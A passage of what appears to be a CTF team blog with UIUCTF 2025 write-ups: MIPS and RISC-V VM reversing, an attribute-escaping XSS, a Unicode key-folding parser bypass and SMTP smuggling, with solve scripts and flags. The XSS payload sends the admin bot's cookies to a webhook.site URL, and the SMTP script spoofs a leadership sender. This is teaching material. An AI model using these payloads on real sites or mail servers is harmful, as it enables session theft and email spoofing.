li    $v0, 0x13579BDF
xor   $v0, $v1, $v0     ; y ^= 0x13579BDF
sw    $v0, 0x38($sp)

dli   $v0, 0xC956B3009784E40F
sd    $v0, 0x48($sp)
li    $v0, 0xFFFFFFFF83C5A9D1
sw    $v0, 0x50($sp)

ld    $v1, 0x30($sp)    ; x
ld    $v0, 0x48($sp)    ; target64
bne   $v1, $v0, loc_7D8 ; fail if x != target

lw    $v1, 0x38($sp)    ; y
lw    $v0, 0x50($sp)    ; target32
bne   $v1, $v0, loc_7D8 ; fail if y != target

in pseudoC:

uint64_t x = u64le(&buf[16]) ^ 0x1337C0DE12345678ULL;
uint32_t y = u32le(&buf[24]) ^ 0x3EADBE3F;

x = rol64(x, 8) + 0x0123456789ABCDEFULL;
y = rol32(y, 4) + 0x87654321U;

x ^= ((uint64_t)y) << 32;
y ^= (uint32_t)x;

x ^= 0xFEDCBA9876543210ULL;
y ^= 0x13579BDFU;

ok &= (x == 0xC956B3009784E40FULL);
ok &= (y == 0x83C5A9D1U);

I used the following python script to demangle this part (with a bit of overlap with bytes already discovered in section 4):

#decipher.py
def ror64(val, r):
    return ((val >> r) | (val << (64 - r))) & 0xFFFFFFFFFFFFFFFF

def ror32(val, r):
    return ((val >> r) | (val << (32 - r))) & 0xFFFFFFFF

def find_key_bytes():

    target_E = 0xC956B3009784E40F
    target_F = 0x83C5A9D1


    E = target_E ^ 0xFEDCBA9876543210
    F = target_F ^ 0x13579BDF
    print(f"After final inverse XOR: E=0x{E:016x}, F=0x{F:08x}")


    F_before_mix = F ^ (E & 0xFFFFFFFF)
    E_before_mix = E ^ (F_before_mix << 32)
    print(f"After inverse Feistel: E=0x{E_before_mix:016x}, F=0x{F_before_mix:08x}")


    E_before_add = (E_before_mix - 0x0123456789ABCDEF) & 0xFFFFFFFFFFFFFFFF
    F_before_add = (F_before_mix - 0x87654321) & 0xFFFFFFFF
    print(f"After subtraction: E=0x{E_before_add:016x}, F=0x{F_before_add:08x}")


    E_before_rot = ror64(E_before_add, 8)
    F_before_rot = ror32(F_before_add, 4)
    print(f"After inverse rotation: E=0x{E_before_rot:016x}, F=0x{F_before_rot:08x}")


    E_original = E_before_rot ^ 0x1337C0DE12345678
    F_original = F_before_rot ^ 0x3EADBE3F
    print(f"Original values: E=0x{E_original:016x}, F=0x{F_original:08x}")


    E_bytes = E_original.to_bytes(8, 'little')
    F_bytes = F_original.to_bytes(4, 'little')


    char23 = E_bytes[7]  #ultimo byte di E
    char24 = F_bytes[0]  #primo byte di F
    print(f"\nVerify sum: 0x{char23:02x} + 0x{char24:02x} = 0x{char23 + char24:02x} (Has to be 0x53)")


    print(f"\nBytes 16-23: {E_bytes.hex()} = '{E_bytes.decode('ascii', errors='replace')}'")
    print(f"Bytes 24-27: {F_bytes.hex()} = '{F_bytes.decode('ascii', errors='replace')}'")

    return E_bytes + F_bytes

result = find_key_bytes()

Bytes 16-23: 70736c3076657223 = 'psl0ver#' Bytes 24-27: 30643030 = '0d00'

flag = uiuctf{U_Uctf_m1psl0ver#0d00_abcdefghi}

Now, if everything is correct, we should be able to patch our memory.mem file and see \n===verification passed!===\n printed in the output.

Patching it up

Remember data_mem.sv? In Verilog, the memory initialization function is defined as follows:

$readmemh("hex_memory_file.mem", memory_array, [start_address], [end_address])

start_address is optional and undefined in our case, so memory starts at 0x0.

The firmware reads the candidate key starting at absolute address 0x00000008 (unk_8 in the disassembly), and in memory.mem the @00000000 block clearly shows those ef bf bd bytes starting at offset 0x08.

Now let’s ASCII-encode the flag and add a null terminator at the end, while keeping the rest unchanged:

//memory.mem
@00000000
28 09 00 00
00 00 00 00
75 69 75 63
74 66 7b 55
5f 55 63 74
66 5f 6d 31
70 73 6c 30
76 65 72 23
30 64 30 30
5f 61 62 63
64 65 66 67
68 69 7d 00
47 43 43 3a
20 28 47 4e

Make sure to keep the file name the same as well, the elf automatically takes memory.mem as input.

Everything is back up and running!

Here is the final script I used during the CTF:

from typing import Tuple

# do a barrel roll
def rol32(v: int, r: int) -> int:
    return ((v << r) & 0xFFFFFFFF) | (v >> (32 - r))

def ror32(v: int, r: int) -> int:
    return ((v >> r) | (v << (32 - r))) & 0xFFFFFFFF

def rol64(v: int, r: int) -> int:
    return ((v << r) & 0xFFFFFFFFFFFFFFFF) | (v >> (64 - r))

def ror64(v: int, r: int) -> int:
    return ((v >> r) | (v << (64 - r))) & 0xFFFFFFFFFFFFFFFF

# cryptoninja block
CT_X = 0xC956B3009784E40F
CT_Y = 0xFFFFFFFF83C5A9D1 & 0xFFFFFFFF       # 32 bit

def invert_block() -> Tuple[bytes, bytes]:

    x3 = CT_X ^ 0xFEDCBA9876543210
    y3 = (CT_Y ^ 0x13579BDF) & 0xFFFFFFFF     # 32 bit

    x3_low = x3 & 0xFFFFFFFF
    y2 = x3_low ^ y3
    x2 = x3 ^ (y2 << 32)

    x1 = (x2 - 0x0123456789ABCDEF) & 0xFFFFFFFFFFFFFFFF
    y1 = (y2 - 0xFFFFFFFF87654321) & 0xFFFFFFFF

    x0 = ror64(x1, 8)
    y0 = ror32(y1, 4)

    eight  = x0 ^ 0x1337C0DE12345678          # 64 bit
    four   = y0 ^ 0x3EADBE3F                  # 32 bit

    return eight.to_bytes(8, 'little'), four.to_bytes(4, 'little')

def build_flag() -> str:
    eight, four = invert_block()

    flag = (
        b"uiuctf{"          # prefix
        b"U_Uctf_"          # xor
        b"m1"               # dedicated check
        + eight             # bytes 16‑23
        + four              # bytes 24‑27
        + b"_"              # offset 28
        + b"abcdefghi"      # offset 29‑37
        + b"}"              # closure
    )
    return flag.decode()

#verifica
def verify(flag: str) -> bool:
    assert flag.startswith("uiuctf{") and flag.endswith("}")
    assert flag[7] == "U"
    assert flag[8] == "_"
    assert flag[9:13] == "Uctf"
    assert flag[13] == "_"
    assert flag[14:16] == "m1"
    assert (ord(flag[23]) + ord(flag[24])) == 0x53
    assert flag[28] == "_"
    assert flag[29:38] == "abcdefghi"
    import struct
    key = flag.encode()
    eight = int.from_bytes(key[16:24], 'little')
    four  = int.from_bytes(key[24:28], 'little')

    x = rol64((eight ^ 0x1337C0DE12345678), 8)
    x = (x + 0x0123456789ABCDEF) & 0xFFFFFFFFFFFFFFFF

    y = rol32((four ^ 0x3EADBE3F), 4)
    y = (y + 0xFFFFFFFF87654321) & 0xFFFFFFFF

    x ^= (y << 32)
    y ^= x & 0xFFFFFFFF
    x ^= 0xFEDCBA9876543210
    y ^= 0x13579BDF
    return x == CT_X and y == CT_Y

if __name__ == "__main__":
    flag = build_flag()
    print("Flag:", flag)
    assert verify(flag), "something went wrong!"

Trivia and extras

Fun fact: the flag format was actually changed due to this solve during the course of the competition, after an exchange I had with one of the moderators; it initially did not contain a #, the full regex was uiuctf{[a-zA-Z0-9_&]+}, this made me double check and second guess the flag for quite a while before actually submitting it. No big deal though, it was fixed shortly after.

During our first approach to the challenge, @simonedimaria managed to recompile the source files with debugging logs:

Interrupe Handler Address: 0000000008000040
---- Damaged region dump ----
mem[8] = ef
mem[9] = bf
mem[a] = bd
mem[b] = ef
mem[c] = bf
mem[d] = bd
mem[e] = ef
mem[f] = bf
mem[10] = bd
mem[11] = ef
mem[12] = bf
mem[13] = bd
mem[14] = ef
mem[15] = bf
mem[16] = bd
mem[17] = ef
mem[18] = bf
mem[19] = bd
mem[1a] = ef
mem[1b] = bf
mem[1c] = bd
mem[1d] = ef
mem[1e] = bf
mem[1f] = bd
mem[20] = ef
mem[21] = bf
mem[22] = bd
mem[23] = ef
mem[24] = bf
mem[25] = bd
mem[26] = ef
mem[27] = bf
mem[28] = bd
mem[29] = ef
mem[2a] = bf
mem[2b] = bd
mem[2c] = ef
mem[2d] = bf
mem[2e] = 7d
-----------------------------
PC=0x000000000000010c, inst=0x24190148, rs_data(t0)=0x0000000000000000, rt_data(i)=0x0000000000000000
writeback regnum = 29, data = 0000000000000d00
PC=0x0000000000000110, inst=0x03200009, rs_data(t0)=0x0000000000000000, rt_data(i)=0x0000000000000000
writeback regnum = 28, data = 0000000000000af0
PC=0x0000000000000114, inst=0x00000000, rs_data(t0)=0x0000000000000000, rt_data(i)=0x0000000000000000
writeback regnum = 31, data = 0000000000000d00
writeback regnum = 25, data = 0000000000000148
write addr: 0000000000000cf8, data: 0000000000000d00, type: 4
writeback regnum = 29, data = 0000000000000c90
writeback regnum =  2, data = 0000000000000000
...

Only to later realize that those were only puts-related logs, his contribution was nonetheless crucial to the final solution.

UIUCTF 25 - Ruler of the Universe

info@theromanxpl0.it (TRX) — Wed, 30 Jul 2025 00:00:00 +0000

With this ship I have the entire universe at my fingertips.

Hi everyone, this is the first and easiest in a series of four sci-fi-inspired cosmic-web challenges from uiuctf. I only solved the first three, while my teammate simonedimaria worked on the fourth one, so I will only be tackling those.

First of all, let’s take a second to appreciate the homepage of the challenge.

Straight out of last-century digital retrofuturism, System Shock or Neuromancer come to mind.

Full diagnostic sweep of the mainframe

There’s an Admin Bot link at the top, which points us in the direction of XSS.

That’s cool and all, but what can we actually interact with? Let’s open those ominous Astra Main Frame modules at the bottom:

Looks like we can leave a message for the crew, and it will appear under Messages at the bottom. Hmm, looks suspicious, let’s pull up the ship’s source code:

// module.tsx
const Module = ({
  id,
  crewMessage,
}: {
  id: number;
  crewMessage: string | null | undefined;
}) => {
  // ...
  "mt-4" method="GET">
    "message" class="block text-sm mb-1">
      Crew Message:
    
          id="message"
      name="message"
      type="text"
      class="w-full border border-green-400 bg-black text-green-400 px-2 py-1 text-xs"
      placeholder={
        crewMessage
          ? `Update your message: ${crewMessage}`
          : "Enter a message for the crew"
      }
    />
  
  // ...
};
:contentReference[oaicite:2]{index=2}

crewMessage is taken directly from index.tsx’s const crewMessage = new URL(req.url).searchParams.get("message"); and interpolated into the placeholder. Diving deeper into how all of this gets rendered onto the page:

import { escapeHTML } from "bun";

export function render(element: any): string {
  if (typeof element === "string" || typeof element === "number") {
    return escapeHTML(element);
  }
//...
  const propString = props
    ? Object.entries(props)
        .filter(([key]) => key !== "children")
        .map(([key, value]) => {
          if (typeof value === "boolean") {
            return value ? key : "";
          }
          // Here is where double quotes are improperly escaped
          return `${key}="${String(value).replace('"', """)}"`;
        })
        .filter(Boolean)
        .join(" ")
    : "";

  const openTag = propString ? `<${type} ${propString}>` : `<${type}>`;
  return `${openTag}${children}${type}>`;
}

The render function employs Bun’s escapeHTML, which makes the following replacements:

" becomes """
& becomes "&"
' becomes "'"
< becomes "<"
> becomes ">"

however, it only does so for strings and numbers; for attributes, a much weaker substitution is in place:

return `${key}="${String(value).replace('"', """)}"`;

but replace only takes care of the first instance of the character in a string.

Initiating the breach protocol

Knowing all this, and with a bit of trial and error, we can craft a working payload:

crewMessage = "" />"alert(1)" x="

During serialization:

the first " in "" becomes "
the second " closes the input attribute

the final markup becomes:

… placeholder="Update your message: ""
/>
"alert(1)" x=>

Now it’s only a matter of adapting it to our purposes:

"" />"fetch(\'%s?c=\'+encodeURIComponent(document.cookie))" x="

Finally, we encode it into the full URL and send a POST request with the link to the Admin Bot to visit the page and retrieve the flag, which is in the bot’s cookies, by forwarding it to our webhook:

https://inst-8be5f028661a5917-ruler-of-the-universe.chal.uiuc.tf/module/0?message=img%22%22%20%2F%3E%3Cimg%20src%3Dx%20onerror%3D%22fetch%28%27https%3A%2F%2Fwebhook.site%2F66ce23cb-d0e5-4bf5-9016-58351c7f0d51%3Fc%3D%27%2BencodeURIComponent%28document.cookie%29%29%22%20x%3D%22

uiuctf{maybe_i_should_just_use_react_c49b79}

UIUCTF 25 - Shipping Bay

info@theromanxpl0.it (TRX) — Wed, 30 Jul 2025 00:00:00 +0000

UPS lost my package, so I’m switching to a more reliable carrier.

Here we are in Chapter Three of our Cyberspace Odyssey for uiuctf; this time, we are tasked with retrieving a particular cosmic cargo that got lost during astral shipping.

A real flashback to the future with its Y2K/Vaporwave Classic Windows 98 UI, proof that even in the space age, fashion remains cyclical.

Unpacking the interplanetary cargo

Let’s try to create a new shipment.

We can pick from a variety of options here, but it doesn’t really matter, the space courier will always lose our package

https://shipping-bay.chal.uiuc.tf/?status=oops+we+lost+the+package

Prodding at the code, there doesn’t seem to be much we can work with, this debugging flag looks interesting at first:

if __name__ == '__main__':
	app.run(debug=True)

but it’s merely a red herring, we have no way of triggering the Werkzeug debug console.

Among the various supply types, there is one that piques our interest:

//main.go
func sendShipment(shipment Shipment) string {
    if shipment.SupplyType == "flag" {
        if flag, exists := os.LookupEnv("FLAG"); exists {
            return flag
        }
        return "uiuctf{fake_flag}"
    }
    return "oops we lost the package"
}

But in order to retrieve our package, we first have to go through two different checks, this one in Go and the first one in index.py:

def create_shipment():
    shipment_data = {k.lower(): v for k, v in request.form.items()}

    if shipment_data['supply_type'] == "flag":
        return "Error: Invalid supply type", 400

    shipment_status = subprocess.check_output(["/home/user/processing_service", json.dumps(shipment_data)]).decode().strip()

    return redirect(url_for('index', status=shipment_status))

Flask collects all submitted fields into a dict, lowercasing each key, so we can’t simply enter two identical supply_type parameters or use capital letters to trick it into accepting our input.

Note, however, that this still allows us to enter two different supply_type fields in our input, as long as the second one is worded ever-so-slightly differently.

But how can we bypass it while ensuring that Go still reads a properly formatted supply_type = flag from the resulting Json?

Resistance is futile

Thankfully, my teammate Leonardo came to the rescue and found this article that mentions this exact scenario.

We are going to use this character: ſ (Latin small long‑s, U+017F, unchanged by .lower()), which enables us to construct our final payload:

    form = [
        ("origin",       uid),
        ("destination",  "Luna City"),
        ("weight",       "1 ton"),
        ("priority",     "Low"),
        ("vessel",       "USS Tomorrow"),
        ("supply_type",  "Tools"),           # passes the first python filter
        ("ſupply_type",   "flag"),           # overwrites the go parser
    ]

But what is going on under the hood?

On the Python side, only the ASCII‐key "supply_type" is checked, with our payload the ASCII key is still "Tools", so this check passes.

json.dumps(shipment_data)
subprocess.check_output(["/home/user/processing_service", json.dumps(shipment_data)])

Json marshalling turns the payload into:

{
  "origin":"…",
  …,
  "supply_type":"Tools",
  "ſupply_type":"flag"
}

note that both keys appear distinctly

On the Go (processing_service) side:

Go’s JSON unmarshaller scans keys in order and, upon each match, sets the struct field

type Shipment struct {
    …
    SupplyType string `json:"supply_type"`
    …
}

It matches keys using Unicode case‑folding (strings.EqualFold), which maps both ASCII “s” and the long‑s “ſ” to the same fold class “s”.
Therefore:
1. On seeing "supply_type":"Tools", it sets SupplyType = "Tools".
2. On seeing "ſupply_type":"flag", it also matches the same field (since “ſ” folds to “s”) and overwrites it with "flag" This gives rise to a sort of pseudo-homographic parser differential attack.

Final script

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re, uuid, requests
from urllib.parse import unquote_plus

BASE   = "https://shipping-bay.chal.uiuc.tf/"
CREATE = f"{BASE}/create_shipment"

def pretty(loc):
    if not loc:
        return None
    decoded = unquote_plus(loc)
    print("\n───── Location (decoded) ─────")
    for line in decoded.splitlines():
        print("│", line)
    print("───────────────────────────────")
    m = re.search(r"uiuctf\{[^}]+\}", decoded)
    return m.group(0) if m else None

def main():
    uid = f"Earth‑{uuid.uuid4()}"
    form = [
        ("origin",       uid),
        ("destination",  "Luna City"),
        ("weight",       "1 ton"),
        ("priority",     "Low"),
        ("vessel",       "USS Tomorrow"),
        ("supply_type",  "Tools"),           #passes Python filter
        ("ſupply_type",   "flag"),           #second field - passes Go's parser
    ]

    r = requests.post(CREATE, data=form, allow_redirects=False, timeout=5)
    print(f"[+] HTTP {r.status_code}")
    for k, v in r.headers.items():
        print(f"    {k}: {v}")

    flag = pretty(r.headers.get("Location", ""))
    print("\n[+] FLAG:", flag or "not found")

if __name__ == "__main__":
    main()

ALL YOUR FLAGS ARE BELONG TO US

uiuctf{maybe_we_should_check_schemas_8e229f}

UIUCTF 25 - Supermassive Black Hole

info@theromanxpl0.it (TRX) — Wed, 30 Jul 2025 00:00:00 +0000

Black Hole Ticketing Services prides itself on losing tickets at the speed of light. Can you get them to escalate?

Welcome back to the second installment in this series of cyber-spacefaring challenges from uiuctf.

Not as fancy as Ruler of the Universe, but far less dystopian than some real-world customer service centers.

The About us page contains some useful information, namely leadership@blackholeticketing.com, that will come in handy later.

Dissecting the Event‑Horizon Mail Hub

There’s an SMTP server running internally on port 1025, unfortunately, the port isn’t exposed to us, so we can’t interact with it directly:

smtp_server.py

async def start_server():
    init_database()

    it_handler = ITBotHandler()
    controller = Controller(it_handler, hostname='localhost', port=1025)

    controller.start()

    return controller

async def main():
    controller = await start_server()

    try:
        while True:
            await asyncio.sleep(5)
    except KeyboardInterrupt:
        controller.stop()

if __name__ == "__main__":
    asyncio.run(main())

Luckily, though, we don’t need to, the server does all the work for us, everything we type into the ticket submission form gets conveniently inserted into a pre-packaged message and relayed to the SMTP listener:

web_server.py

        message_data = f"""\
From: support@blackholeticketing.com\r\n\
To: it@blackholeticketing.com\r\n\
Subject: {subject}\r\n\
X-Ticket-ID: {ticket_id}\r\n\
\r\n\
{message}\r\n\
.\r\n""".encode()

        ending_count = message_data.count(b'\r\n.\r\n')
        if ending_count != 1:
            raise ValueError("Bad Request")

        with smtplib.SMTP('localhost', 1025) as client:
            client.helo("example.com")
            client.sendmail('support@blackholeticketing.com', ['it@blackholeticketing.com'], message_data)
            # Wait a second for SMTP to process the ticket
            time.sleep(1)

        ticket_data = {
            'id': ticket_id,
            'timestamp': int(time.time() * 1000),
            'from': 'support@blackholeticketing.com',
            'subject': subject,
            'body': message,
            'status': 'submitted'
        }

        return render_template('ticket_submitted.html', ticket_data=ticket_data)

If we can somehow manage to change the sender address to leadership@blackholeticketing.com, and impersonate their star‑fleet commander‑in‑chief, the server will print out the flag for us.

smtp_server.py

from_header = message.get('From', 'Unknown')
subject = message.get('Subject', 'No Subject')
body = str(message.get_payload())
ticket_id = message.get('X-Ticket-ID', f'{int(time.time())}_{self.processed_count}')

if internal.leadership_email in from_header.lower():
    response = "C-Suite ticket received! Will escalate immediately!" + f"\n{internal.flag}"
elif internal.support_email in from_header.lower():
    response = "Request for support received! Will resolve after lunch break."
else:
    response = "Please use our support portal to submit a ticket."

Now, the Intergalactic Postal Center must suffer from the same understaffing and underpaying issues we have here on Earth, because somebody decided it would be a good idea to override every inherent safety function in the Python SMTP library:

try:
    smtplib._fix_eols = return_unchanged
    smtplib._quote_periods = return_unchanged
    smtplib.SMTP.data = new_data

_fix_eols normally converts \n into \r\n to follow the SMTP standard,
_quote_periods does dot-stuffing (adds an extra period at the start of every line that begins with a period),
SMTP.data was patched with new_data.

It instead only runs one check:

ending_count = message_data.count(b'\r\n.\r\n')
if ending_count != 1:
    raise ValueError("Bad Request")

it counts the number of terminators and allows there to be only one, this is to prevent us from closing our message and crafting a new one inside the same input. But since fix_eols is deactivated, this is vulnerable to CRLF injection.

Examining the vulnerability

We can use \n.\r\n, a.k.a LF‑dot‑CRLF, to close our crafted message, the SMTP server will recognize a dot-only line as end-of-DATA, and everything that follows (MAIL FROM:…, RCPT TO:…, etc.) will be interpreted as new SMTP commands.

The payload

"\n.\r\n"
"MAIL FROM:\r\n"
"RCPT TO:\r\n"
"DATA\r\n"
"From: leadership@blackholeticketing.com\r\n"
"To: it@blackholeticketing.com\r\n"
"Subject: escalate\r\n"
"X-Ticket-ID: 1444\r\n"
"\r\n"
"pls fix asap\r\n"
".\n"

Ticket-ID was added only for convenience and is not necessary for the final exploit

Thus we add our own custom sender and receiver and pass the message on to the server.

Final script

#!/usr/bin/env python3
import requests, time, textwrap

#BASE = "http://localhost:8080"
BASE = "https://inst-4e64969ec136b504-supermassive-black-hole.chal.uiuc.tf/"

payload = (
    "\n.\r\n"
    "MAIL FROM:\r\n"
    "RCPT TO:\r\n"
    "DATA\r\n"
    "From: leadership@blackholeticketing.com\r\n"
    "To: it@blackholeticketing.com\r\n"
    "Subject: escalate\r\n"
    "X-Ticket-ID: 1444\r\n"
    "\r\n"
    "pls fix asap\r\n"
    ".\n"
)

#injection ticket
requests.post(f"{BASE}/submit_ticket",
              data={"subject": "Outage", "message": payload})

#wait for the bot to process
time.sleep(2)


resp = requests.get(f"{BASE}/check_response/1444").json()
print(resp["response"])

uiuctf{7h15_c0uld_h4v3_b33n_4_5l4ck_m355463_8091732490}

UIUCTF 25 - ELF Capsule

info@theromanxpl0.it (TRX) — Tue, 29 Jul 2025 11:15:30 +0200

Description

The ELF cannot be effectively delivered without the ELF.

Note: The flag consists of only printable ASCII characters.

The flag has format uiuctf{…}, and inputs to program should follow this format. Your solve script shouldn’t take more than 10 minutes to run.

Author: CBCicada

Analysis

First thing first, we can start by throwing common commands against this binary, such as strings or binwalk, binwalk finds a hidden binary inside the binary, this will be useful later; in the strings there is not something useful.

In the main RICV binary, following a bit of the code flow from the start function, we see that we arrive through sub_80000060 at loc_80000E78 which loads the addr of the inner elf into a register and then it calls sub_800004BC that will dispatch the embedded binary

loc_80000E78:
    addi    sp, sp, -20h
    sd      ra, 18h(sp)
    sd      s0, 10h(sp)
    addi    s0, sp, 20h # ' '
    call    sub_80000210
    addi    a1, s0, -18h
    la      a0, unk_80001000 # Inner Binary
    call    sub_800004BC # Dispatch function
    lui     a0, 801h
    ld      a1, -18h(s0)
    slli    a0, a0, 8
    la      a2, unk_80006010
    addi    a0, a0, -1
    call    sub_800001DC

We will return to this binary after looking the second one.

Inner binary

As there’s only one function present, it’s time to dig into it. Immediately, three patterns stand out, each mimicking virtual machine instructions implemented via exception-driven control flow.

In RISCV, invalid memory accesses raise exceptions that provide context through two special registers:

scause: indicates the type of fault (e.g., 5 for load access fault, 7 for store/AMO access fault)
stval: holds the offending address, which in our case is crafted to act as an opcode

The handler in the main binary (at sub_800001C0) uses these values to determine what action to take. Specifically:

This transforms stval into an indexable opcode. Thus, load and store instructions to invalid addresses are used intentionally to encode calls to virtual instructions. There are three key patterns:

Pattern 1: Store to an invalid address — triggers scause = 7

li   a5, 421h
la   a4, aWhatIsTheFlag # "What is the flag?"
sd   a4, 0(a5)

This triggers the VM handler, which reads stval = 0x421 and scause = 7, resulting in a store-based opcode lookup.

Pattern 2: Load from an invalid address — triggers scause = 5

li  a5, 0DD3h
ld  a5, 0(a5)

Now the VM handler sees stval = 0xDD3 and scause = 5, and dispatches the corresponding “load” opcode.

Pattern 3: Computed addresses and mixed instructions

lui   a5, 1
addi  a4, a5, -37Ah
li    a5, 0DD3h
ld    a4, 0(a4)
sd    a4, 0(a5)

In this case, address values are calculated dynamically before being used in a ld or sd, resulting again in a VM “call” through exception handling. The store and load exceptions are used interchangeably depending on which virtual instruction is being simulated.

This exception-based dispatch mechanism lets the embedded binary implement a full virtual instruction set without needing a real dispatcher loop, relying instead on the RISC-V architecture’s exception handling features to interpret VM opcodes.

Main binary

As we saw earlier sub_800001C0 contains the code of the functions that are called with codes as invalid memory addresses, there are two branches, one for operation type (load and store), that will do 2 similar operations, for example the xor operation is defined as stack[-1] ^= a4 for the stores and a4 = stack[-2] ^ stack[-1] for the loads, this pattern is shared between all operations + some functions that are one, the inverse of the other (like push and pop).

Decompiler

Given the previous patterns is possible to write a simple pattern matching decompiler (more like a function call resolver) for the inner binary.

We can start by enumerating all the found functions from the first binary function sub_800001C0 which contains all the “opcodes” that are called, and also we notice that the “load and “store” operations are actually two different type of instructions. (the push_call are like the init of a for loop and we have 3 of them, then the pop_call is the dec of the loop index)

sd_codes = {
	0: 'exit',
    105: 'print a4',
    719: 'push_call_1',
    720: 'push_call_2',
    721: 'push_call_3',
    1195: 'push a4',
    1401: 'stack[-1] |= a4',
    1763: 'stack[-1] ^= a4',
    3094: 'stack[-1] *= a4',
    3291: 'stack[-1] rol= a4',
    3625: 'encrypt a4',
    3893: 'stack[-1] += a4'
}

ld_codes = {
	0: 'exit',
    105: 'getchar a4',
    719: 'pop_call_1',
    720: 'pop_call_2',
    721: 'pop_call_3',
    1195: 'pop a4',
    1401: 'a4 = stack[-2] | stack[-1]',
    1763: 'a4 = stack[-2] ^ stack[-1]',
    3094: 'a4 = stack[-2] * stack[-1]',
    3291: 'a4 = rol stack[-2] stack[-1]',
    3625: 'decrypt a4',
    3893: 'a4 = stack[-2] + stack[-1]'
}

def decode_vm_opcode(stval):
    return (105 * (stval ^ 0x420)) & 0xFFF

then we can extract the values that will be called

li_regex = re.compile(r"li\s*a(.),\s(.*)h")

if m := li_regex.match(inst):
	if int(m.group(1)) == 4:
		if a4 is not None:
			print(f"Warn: Found 'li a4' double at {hex(addr)}")
			break
		a4 = int(m.group(2), 16)
	else:
		if a5 is not None:
			print(f"Warn: Found 'li a5' double at {hex(addr)}")
			break
		a5 = int(m.group(2), 16)
	addr += inst_size
	continue

we can now resolve the “store” calls into a real call

sd_regex = re.compile(r"s(d|b)\s*(a4|zero),\s0\(a(.)\)")

if m := sd_regex.match(inst):
	if int(m.group(3)) == 4:
		if a4 is None:
			print(f"Warn: Found 'sd a4' without a4 at {hex(addr)}")
			break
		real_func = decode_vm_opcode(a4)
		real_func = sd_codes.get(real_func, f'unknown_{real_func}')
		a4 = None
	else:
		if a5 is None:
			print(f"Warn: Found 'sd a5' without a5 at {hex(addr)}")
			break
		real_func = decode_vm_opcode(a5)
		real_func = sd_codes.get(real_func, f'unknown_{real_func}')
		a5 = None
	inst = f'{real_func}'

then we step to the “load” calls that are similar to the above

ld_regex = re.compile(r"l(d|bu)\s*a.,\s0\(a(.)\)")

if m := ld_regex.match(inst):
	if int(m.group(2)) == 4:
		if a4 is None:
			print(f"Warn: Found 'ld a4' without a4 at {hex(addr)}")
			break
		real_func = decode_vm_opcode(a4)
		real_func = ld_codes.get(real_func, f'unknown_{real_func}')
		a4 = None
	else:
		if a5 is None:
			print(f"Warn: Found 'ld a5' without a5 at {hex(addr)}")
			break
		real_func = decode_vm_opcode(a5)
		real_func = ld_codes.get(real_func, f'unknown_{real_func}')
		a5 = None
	inst = f'{real_func}'

then we can end with the “lui” calls

lui = 'lui             a5, 1'
addi_regex = re.compile(r"addi\s*a.,\sa.,\s(.*)h")

if lui in inst:
	addi_inst = idc.GetDisasm(addr+inst_size)
	addi_insn = ida_ua.insn_t()
	ida_ua.decode_insn(addi_insn, addr+inst_size)
	inst_size += addi_insn.size

	m = addi_regex.match(addi_inst)
	a4 = int(m.group(1), 16)

	addr += inst_size
	continue

Final Code

import ida_hexrays
import ida_lines
import ida_funcs
import ida_kernwin
import idautils
import idc
import idaapi
import ida_ua

import re


ea = idaapi.get_screen_ea()
func = ida_funcs.get_func(ea)

if not func:
	print("No function found at the current address.")
	exit(1)

start = func.start_ea
end = func.end_ea

sd_codes = {
	0: 'exit',
    105: 'print a4',
    719: 'push_call_1',
    720: 'push_call_2',
    721: 'push_call_3',
    1195: 'push a4',
    1401: 'stack[-1] |= a4',
    1763: 'stack[-1] ^= a4',
    3094: 'stack[-1] *= a4',
    3291: 'stack[-1] rol= a4',
    3625: 'encrypt a4',
    3893: 'stack[-1] += a4'
}

ld_codes = {
	0: 'exit',
    105: 'getchar a4',
    719: 'pop_call_1',
    720: 'pop_call_2',
    721: 'pop_call_3',
    1195: 'pop a4',
    1401: 'a4 = stack[-2] | stack[-1]',
    1763: 'a4 = stack[-2] ^ stack[-1]',
    3094: 'a4 = stack[-2] * stack[-1]',
    3291: 'a4 = rol stack[-2] stack[-1]',
    3625: 'decrypt a4',
    3893: 'a4 = stack[-2] + stack[-1]'
}

def decode_vm_opcode(stval):
    return (105 * (stval ^ 0x420)) & 0xFFF


li_regex = re.compile(r"li\s*a(.),\s(.*)h")
sd_regex = re.compile(r"s(d|b)\s*(a4|zero),\s0\(a(.)\)")
ld_regex = re.compile(r"l(d|bu)\s*a.,\s0\(a(.)\)")
lui = 'lui             a5, 1'
addi_regex = re.compile(r"addi\s*a.,\sa.,\s(.*)h")

PRINT = 1

insts = []
a4 = None
a5 = None

addr = start
while addr < end:
	inst = idc.GetDisasm(addr)
	insn = ida_ua.insn_t()
	ida_ua.decode_insn(insn, addr)
	inst_size = insn.size

	if m := li_regex.match(inst):
		if int(m.group(1)) == 4:
			if a4 is not None:
				print(f"Warn: Found 'li a4' double at {hex(addr)}")
				break
			a4 = int(m.group(2), 16)
		else:
			if a5 is not None:
				print(f"Warn: Found 'li a5' double at {hex(addr)}")
				break
			a5 = int(m.group(2), 16)
		addr += inst_size
		continue

	elif m := sd_regex.match(inst):
		if int(m.group(3)) == 4:
			if a4 is None:
				print(f"Warn: Found 'sd a4' without a4 at {hex(addr)}")
				break
			real_func = decode_vm_opcode(a4)
			real_func = sd_codes.get(real_func, f'unknown_{real_func}')
			a4 = None
		else:
			if a5 is None:
				print(f"Warn: Found 'sd a5' without a5 at {hex(addr)}")
				break
			real_func = decode_vm_opcode(a5)
			real_func = sd_codes.get(real_func, f'unknown_{real_func}')
			a5 = None
		inst = f'{real_func}'

	elif m := ld_regex.match(inst):
		if int(m.group(2)) == 4:
			if a4 is None:
				print(f"Warn: Found 'ld a4' without a4 at {hex(addr)}")
				break
			real_func = decode_vm_opcode(a4)
			real_func = ld_codes.get(real_func, f'unknown_{real_func}')
			a4 = None
		else:
			if a5 is None:
				print(f"Warn: Found 'ld a5' without a5 at {hex(addr)}")
				break
			real_func = decode_vm_opcode(a5)
			real_func = ld_codes.get(real_func, f'unknown_{real_func}')
			a5 = None
		inst = f'{real_func}'

	elif lui in inst:
		addi_inst = idc.GetDisasm(addr+inst_size)
		addi_insn = ida_ua.insn_t()
		ida_ua.decode_insn(addi_insn, addr+inst_size)
		inst_size += addi_insn.size

		m = addi_regex.match(addi_inst)
		a4 = int(m.group(1), 16)

		addr += inst_size
		continue



	insts.append((addr, inst))
	if PRINT:
		print(f"{hex(addr)}: {inst}")

	addr += inst_size

else:
	with open('decomp.txt', 'w') as f:
		for addr, inst in insts:
			f.write(f"loc_{hex(addr)[2:]}: {inst}\n")
			if inst.startswith('j') or inst.startswith('exit') or inst.startswith('b'):
